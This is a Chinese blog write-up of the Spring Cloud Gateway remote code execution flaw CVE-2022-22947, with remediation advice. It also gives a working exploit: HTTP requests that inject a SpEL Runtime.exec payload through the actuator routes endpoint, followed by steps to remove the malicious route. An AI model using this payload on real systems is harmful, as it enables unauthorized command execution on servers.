网络知识 娱乐 Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)

Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)

高危

Spring Cloud Gateway 是 Spring Cloud 下的一个项目,该项目是基于 Spring 5.0、Spring Boot 2.0 和 Project Reactor 等技术开发的网关,它旨在为微服务架构提供一种简单有效、统一的 API 路由管理方式。

3 月 1 日,VMware 官方发布安全公告,声明对 Spring Cloud Gateway 中的一处命令注入漏洞进行了修复,漏洞编号为 CVE-2022-22947:

CVE-2022-22947 | Security | VMware Tanzu

漏洞描述

使用 Spring Cloud Gateway 的应用如果对外暴露了 Gateway Actuator 接口,则可能存在被 CVE-2022-22947 漏洞利用的风险。攻击者可通过利用此漏洞执行 SpEL 表达式,从而在目标服务器上执行任意恶意代码,获取系统权限。

影响范围

漏洞利用的前置条件:

  1. 除了 Spring Cloud Gateway 外,程序还用到了 Spring Boot Actuator 组件(它用于对外提供 /actuator/ 接口);

  2. Spring 配置对外暴露 gateway 接口,如 application.properties 配置为:

# 默认为truemanagement.endpoint.gateway.enabled=true
# 以逗号分隔的一系列值,默认为 health# 若包含 gateway 即表示对外提供 Spring Cloud Gateway 接口management.endpoints.web.exposure.include=gateway

漏洞影响的 Spring Cloud Gateway 版本范围:

  • Spring Cloud Gateway 3.1.x < 3.1.1

  • Spring Cloud Gateway 3.0.x < 3.0.7

  • 其他旧的、不受支持的 Spring Cloud Gateway 版本

解决方案

更新升级 Spring Cloud Gateway 到以下安全版本:

  • Spring Cloud Gateway 3.1.1

  • Spring Cloud Gateway 3.0.7

或者在不考虑影响业务的情况下禁用 Gateway actuator 接口:如application.properties 中配置 management.endpoint.gateway.enabled 为 false。

产品支持

洞鉴自定义PoC可支持检测,可咨询长亭科技技术支持人员获取解决方案。

推荐观看

CVE-2022-22947:Spring Cloud Gateway 远程代码执行漏洞复现及修复建议_爱吃橙子的羊的博客-CSDN博客

【Vulfocus】CVE-2022-22947Spring Cloud Gateway远程代码执行漏洞复现 - 简书

CVE-2022-22947 远程代码执行漏洞复现分析 - 安全客,安全资讯平台

Spring Cloud Gateway CVE-2022-22947 漏洞分析|NOSEC安全讯息平台 - 白帽汇安全研究院

示例

抓包

GET / HTTP/1.1
Host: 123.58.236.76:64026
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: think_template=default; PHPSESSID=evrult8mhlb3o6bq7an22fk1kr; _ga=GA1.1.940927922.1654650099; _gid=GA1.1.1263998480.1654650099
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
If-None-Match: "3147526947"
Cache-Control: max-age=0

修改为

构造包含恶意请求的路由,利用burpsuite进行发送

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 123.58.236.76:64026
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 449
​
{
  "id": "hacktest",
  "filters": [{
               "name": "AddResponseHeader",
                       "args": {
                                "name": "Result",
                                "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"id"}).getInputStream()))}"
                               }
             }],
  "uri": "http://example.com"
}

返回包

HTTP/1.1 201 Created
Location: /routes/hacktest
content-length: 0
connection: close

  • 然后应用刚添加的路由发送如下数据包,此数据包会触发表达式执行

    POST /actuator/gateway/refresh HTTP/1.1
  • 发送如下数据包可查看结果

    GET /actuator/gateway/routes/hacktest HTTP/1.1
  • 最后发送如下数据包进行清理,删除所添加的路由

    DELETE /actuator/gateway/routes/hacktest HTTP/1.1
  • 再次刷新路由

    POST /actuator/gateway/refresh HTTP/1.1
  • 访问actuator API接口

    GET /actuator HTTP/1.1
    Host: 123.58.236.76:64026
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4844.51 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Type: application/json
    Content-Length: 454
    ​
    {
      "id": "hacktest",
      "filters": [{
                   "name": "AddResponseHeader",
                           "args": {
                                    "name": "Result",
                                    "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"ls /tmp"}).getInputStream()))}"
                                   }
                 }],
      "uri": "http://example.com"
    }

    注意

    GET /actuator HTTP/1.1
    ​
    {"ls /tmp"}
  • 访问env接口

    GET /actuator/env HTTP/1.1
    Host: 123.58.236.76:64026
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4844.51 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Type: application/json
    Content-Length: 454
    ​
    {
      "id": "hacktest",
      "filters": [{
                   "name": "AddResponseHeader",
                           "args": {
                                    "name": "Result",
                                    "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"ls /tmp"}).getInputStream()))}"
                                   }
                 }],
      "uri": "http://example.com"
    }

利用思路

  1. 确认Spring Cloud Gateway 是否打开actuator gateway

  2. 若打开,在/actuator/gateway/routes/pentest添加恶意路由

  3. 刷新路由,使恶意路由呈现

  4. 触发恶意路由,完成命令执行

如示例所示,在完成添加恶意路由后进行删除恶意路由

首先,可以不进行删除,以上四条为完整思路,测试过并无问题

个人认为,删除是为了清除入侵痕迹,但不明白删除后并刷新,为什么还能继续使用恶意路由,这点还有待思索,期望大佬能解答

关于actuator gateway

参考:Spring Cloud Gateway使用说明(7)-- actuator_xiegwei的博客-CSDN博客_actuator gateway

Spring Cloud Gateway添加了一个全新的、更加详细的格式接口。它添加关于每个路由更多的详细信息,让你可以查看详细的断言、过滤器和其它配置。

下面例子配置/actuator/gateway/routes:

[
  {
    "predicate": "(Hosts: [**.addrequestheader.org] && Paths: [/headers], match trailing slash: true)",
    "route_id": "add_request_header_test",
    "filters": [
      "[[AddResponseHeader X-Response-Default-Foo = 'Default-Bar'], order = 1]",
      "[[AddRequestHeader X-Request-Foo = 'Bar'], order = 1]",
      "[[PrefixPath prefix = '/httpbin'], order = 2]"
    ],
    "uri": "lb://testservice",
    "order": 0
  }
]

同时,这个特性默认是开启的

如果要关闭,如下: Example 73. application.properties

spring.cloud.gateway.actuator.verbose.enabled=false

创建和删除路由

要创建一个路由,发送POST请求 /gateway/routes/{id_route_to_create},参数为JSON结构,具体参数数据结构参考上面章节。

要删除一个路由,发送 DELETE请求 /gateway/routes/{id_route_to_delete}

刷新路由缓存

如果要清理路由的缓存,请POST请求/actuator/gateway/refresh。该请求将返回一个没有body的200返回码。

查找特定路由

要获取单个路由的信息,发送GET请求 /actuator/gateway/routes/{id} (如: /actuator/gateway/routes/first_route),返回结果如下所示:

{
  "id": "first_route",
  "predicates": [{
    "name": "Path",
    "args": {"_genkey_0":"/first"}
  }],
  "filters": [],
  "uri": "https://www.uri-destination.org",
  "order": 0
}]
PathTypeDescription
idString路由id
predicatesArray断言,包括名字和参数
filtersArray路由过滤器
uriString目标URI
orderNumber顺序,值越低,优先级越高。

修复建议

参考漏洞影响范围进行排查,官方已针对此漏洞发布修复补丁,请受影响的用户尽快修复。

官方链接:GH-835 Fix RoutingFunction SpEL evaluation · spring-cloud/spring-cloud-function@0e89ee2 · GitHub